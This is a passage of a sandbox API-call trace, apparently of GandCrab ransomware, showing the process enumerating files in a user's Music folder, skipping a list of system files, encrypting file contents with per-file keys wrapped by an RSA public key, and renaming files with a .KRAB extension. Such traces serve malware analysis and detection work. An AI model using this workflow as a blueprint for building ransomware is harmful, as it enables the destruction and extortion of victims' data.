(lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0094.511] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0094.511] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\d2ca4a08d2ca4dee3d.lock" [0094.512] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.512] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 82 [0094.512] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\d2ca4a08d2ca4dee3d.lock") returned 77 [0094.512] lstrlenW (lpString=".lock") returned 5 [0094.512] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.512] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0094.512] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.513] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.513] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0094.513] lstrcmpW (lpString1="IIcNHHkLQJz3EE2VkiJN.mp3", lpString2=".") returned 1 [0094.513] lstrcmpW (lpString1="IIcNHHkLQJz3EE2VkiJN.mp3", lpString2="..") returned 1 [0094.513] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\", lpString2="IIcNHHkLQJz3EE2VkiJN.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\IIcNHHkLQJz3EE2VkiJN.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\IIcNHHkLQJz3EE2VkiJN.mp3" [0094.513] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.513] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\IIcNHHkLQJz3EE2VkiJN.mp3.KRAB") returned 83 [0094.514] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\IIcNHHkLQJz3EE2VkiJN.mp3") returned 78 [0094.514] lstrlenW (lpString=".mp3") returned 4 [0094.514] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.514] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0094.514] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.514] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\IIcNHHkLQJz3EE2VkiJN.mp3") returned 78 [0094.514] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\IIcNHHkLQJz3EE2VkiJN.mp3") returned 78 [0094.514] lstrcmpiW (lpString1="IIcNHHkLQJz3EE2VkiJN.mp3", lpString2="desktop.ini") returned 1 [0094.514] lstrcmpiW (lpString1="IIcNHHkLQJz3EE2VkiJN.mp3", lpString2="autorun.inf") returned 1 [0094.514] lstrcmpiW (lpString1="IIcNHHkLQJz3EE2VkiJN.mp3", lpString2="ntuser.dat") returned -1 [0094.514] lstrcmpiW (lpString1="IIcNHHkLQJz3EE2VkiJN.mp3", lpString2="iconcache.db") returned 1 [0094.514] lstrcmpiW (lpString1="IIcNHHkLQJz3EE2VkiJN.mp3", lpString2="bootsect.bak") returned 1 [0094.515] lstrcmpiW (lpString1="IIcNHHkLQJz3EE2VkiJN.mp3", lpString2="boot.ini") returned 1 [0094.515] lstrcmpiW (lpString1="IIcNHHkLQJz3EE2VkiJN.mp3", lpString2="ntuser.dat.log") returned -1 [0094.515] lstrcmpiW (lpString1="IIcNHHkLQJz3EE2VkiJN.mp3", lpString2="thumbs.db") returned -1 [0094.515] lstrcmpiW (lpString1="IIcNHHkLQJz3EE2VkiJN.mp3", lpString2="KRAB-DECRYPT.html") returned -1 [0094.515] lstrcmpiW (lpString1="IIcNHHkLQJz3EE2VkiJN.mp3", lpString2="KRAB-DECRYPT.txt") returned -1 [0094.515] lstrcmpiW (lpString1="IIcNHHkLQJz3EE2VkiJN.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.515] lstrcmpiW (lpString1="IIcNHHkLQJz3EE2VkiJN.mp3", lpString2="ntldr") returned -1 [0094.515] lstrcmpiW (lpString1="IIcNHHkLQJz3EE2VkiJN.mp3", lpString2="NTDETECT.COM") returned -1 [0094.515] lstrcmpiW (lpString1="IIcNHHkLQJz3EE2VkiJN.mp3", lpString2="Bootfont.bin") returned 1 [0094.515] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.515] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011898) returned 1 [0094.516] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.516] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.516] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.516] CryptGenRandom (in: hProv=0x1011898, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0094.516] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0094.517] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.517] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011678) returned 1 [0094.517] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.518] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.518] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.518] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0094.518] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0094.518] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.518] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010df8) returned 1 [0094.519] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdae0) returned 1 [0094.519] CryptGetKeyParam (in: hKey=0xfbdae0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0094.519] CryptEncrypt (in: hKey=0xfbdae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0094.519] GetLastError () returned 0x0 [0094.519] CryptDestroyKey (hKey=0xfbdae0) returned 1 [0094.519] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.519] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x10111b0) returned 1 [0094.520] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdfe0) returned 1 [0094.520] CryptGetKeyParam (in: hKey=0xfbdfe0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0094.520] CryptEncrypt (in: hKey=0xfbdfe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0094.520] GetLastError () returned 0x0 [0094.520] CryptDestroyKey (hKey=0xfbdfe0) returned 1 [0094.520] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0094.520] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\IIcNHHkLQJz3EE2VkiJN.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\psj_\\iicnhhklqjz3ee2vkijn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0094.521] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0094.521] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0094.522] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0x37cf, lpOverlapped=0x0) returned 1 [0094.535] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffc831, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.536] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x37cf, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0x37cf, lpOverlapped=0x0) returned 1 [0094.536] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0094.536] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.548] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.549] CloseHandle (hObject=0x43c) returned 1 [0094.549] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.549] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\IIcNHHkLQJz3EE2VkiJN.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\psj_\\iicnhhklqjz3ee2vkijn.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\IIcNHHkLQJz3EE2VkiJN.mp3.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\psj_\\iicnhhklqjz3ee2vkijn.mp3.krab")) returned 1 [0094.550] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.550] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0094.550] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0094.550] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0094.550] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\KRAB-DECRYPT.txt" [0094.550] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.551] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\KRAB-DECRYPT.txt.KRAB") returned 75 [0094.551] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\KRAB-DECRYPT.txt") returned 70 [0094.551] lstrlenW (lpString=".txt") returned 4 [0094.551] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.551] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0094.551] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.551] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\KRAB-DECRYPT.txt") returned 70 [0094.551] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\KRAB-DECRYPT.txt") returned 70 [0094.552] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0094.552] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0094.552] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0094.552] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0094.552] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0094.552] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0094.552] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0094.552] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0094.552] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0094.552] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0094.552] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.552] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0094.552] lstrcmpW (lpString1="ZwFgPRWxbpjXWl1q.wav", lpString2=".") returned 1 [0094.552] lstrcmpW (lpString1="ZwFgPRWxbpjXWl1q.wav", lpString2="..") returned 1 [0094.552] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\", lpString2="ZwFgPRWxbpjXWl1q.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\ZwFgPRWxbpjXWl1q.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\ZwFgPRWxbpjXWl1q.wav" [0094.552] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.552] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\ZwFgPRWxbpjXWl1q.wav.KRAB") returned 79 [0094.552] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\ZwFgPRWxbpjXWl1q.wav") returned 74 [0094.553] lstrlenW (lpString=".wav") returned 4 [0094.553] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.553] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".wav ") returned 5 [0094.553] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.553] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\ZwFgPRWxbpjXWl1q.wav") returned 74 [0094.553] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\ZwFgPRWxbpjXWl1q.wav") returned 74 [0094.553] lstrcmpiW (lpString1="ZwFgPRWxbpjXWl1q.wav", lpString2="desktop.ini") returned 1 [0094.553] lstrcmpiW (lpString1="ZwFgPRWxbpjXWl1q.wav", lpString2="autorun.inf") returned 1 [0094.553] lstrcmpiW (lpString1="ZwFgPRWxbpjXWl1q.wav", lpString2="ntuser.dat") returned 1 [0094.553] lstrcmpiW (lpString1="ZwFgPRWxbpjXWl1q.wav", lpString2="iconcache.db") returned 1 [0094.553] lstrcmpiW (lpString1="ZwFgPRWxbpjXWl1q.wav", lpString2="bootsect.bak") returned 1 [0094.553] lstrcmpiW (lpString1="ZwFgPRWxbpjXWl1q.wav", lpString2="boot.ini") returned 1 [0094.553] lstrcmpiW (lpString1="ZwFgPRWxbpjXWl1q.wav", lpString2="ntuser.dat.log") returned 1 [0094.553] lstrcmpiW (lpString1="ZwFgPRWxbpjXWl1q.wav", lpString2="thumbs.db") returned 1 [0094.553] lstrcmpiW (lpString1="ZwFgPRWxbpjXWl1q.wav", lpString2="KRAB-DECRYPT.html") returned 1 [0094.553] lstrcmpiW (lpString1="ZwFgPRWxbpjXWl1q.wav", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.553] lstrcmpiW (lpString1="ZwFgPRWxbpjXWl1q.wav", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.553] lstrcmpiW (lpString1="ZwFgPRWxbpjXWl1q.wav", lpString2="ntldr") returned 1 [0094.554] lstrcmpiW (lpString1="ZwFgPRWxbpjXWl1q.wav", lpString2="NTDETECT.COM") returned 1 [0094.554] lstrcmpiW (lpString1="ZwFgPRWxbpjXWl1q.wav", lpString2="Bootfont.bin") returned 1 [0094.554] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.554] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010e80) returned 1 [0094.554] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.555] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.555] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.555] CryptGenRandom (in: hProv=0x1010e80, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0094.555] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0094.555] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.556] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1011898) returned 1 [0094.556] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.557] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.557] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.557] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0094.557] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0094.557] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.557] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1010df8) returned 1 [0094.558] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdae0) returned 1 [0094.558] CryptGetKeyParam (in: hKey=0xfbdae0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0094.558] CryptEncrypt (in: hKey=0xfbdae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0094.558] GetLastError () returned 0x0 [0094.558] CryptDestroyKey (hKey=0xfbdae0) returned 1 [0094.558] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.558] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011898) returned 1 [0094.559] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdae0) returned 1 [0094.559] CryptGetKeyParam (in: hKey=0xfbdae0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0094.559] CryptEncrypt (in: hKey=0xfbdae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0094.559] GetLastError () returned 0x0 [0094.559] CryptDestroyKey (hKey=0xfbdae0) returned 1 [0094.559] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0094.559] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\ZwFgPRWxbpjXWl1q.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\psj_\\zwfgprwxbpjxwl1q.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0094.560] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0094.560] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0094.560] ReadFile (in: hFile=0x43c, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ea7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ea7c*=0xf62f, lpOverlapped=0x0) returned 1 [0094.574] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffff09d1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.574] WriteFile (in: hFile=0x43c, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xf62f, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ea78*=0xf62f, lpOverlapped=0x0) returned 1 [0094.575] WriteFile (in: hFile=0x43c, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ea78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ea78*=0x208, lpOverlapped=0x0) returned 1 [0094.575] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.578] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.579] CloseHandle (hObject=0x43c) returned 1 [0094.579] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.579] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\ZwFgPRWxbpjXWl1q.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\psj_\\zwfgprwxbpjxwl1q.wav"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\pSj_\\ZwFgPRWxbpjXWl1q.wav.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\psj_\\zwfgprwxbpjxwl1q.wav.krab")) returned 1 [0094.580] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.580] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0094.580] FindClose (in: hFindFile=0xfbd7a0 | out: hFindFile=0xfbd7a0) returned 1 [0094.581] CloseHandle (hObject=0x778) returned 1 [0094.581] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0094.598] lstrcmpW (lpString1="Zyl8NkUlADcyx.wav", lpString2=".") returned 1 [0094.598] lstrcmpW (lpString1="Zyl8NkUlADcyx.wav", lpString2="..") returned 1 [0094.598] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\", lpString2="Zyl8NkUlADcyx.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Zyl8NkUlADcyx.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Zyl8NkUlADcyx.wav" [0094.599] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.599] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Zyl8NkUlADcyx.wav.KRAB") returned 71 [0094.599] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Zyl8NkUlADcyx.wav") returned 66 [0094.599] lstrlenW (lpString=".wav") returned 4 [0094.599] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.599] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".wav ") returned 5 [0094.599] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.600] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Zyl8NkUlADcyx.wav") returned 66 [0094.600] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\Zyl8NkUlADcyx.wav") returned 66 [0094.600] lstrcmpiW 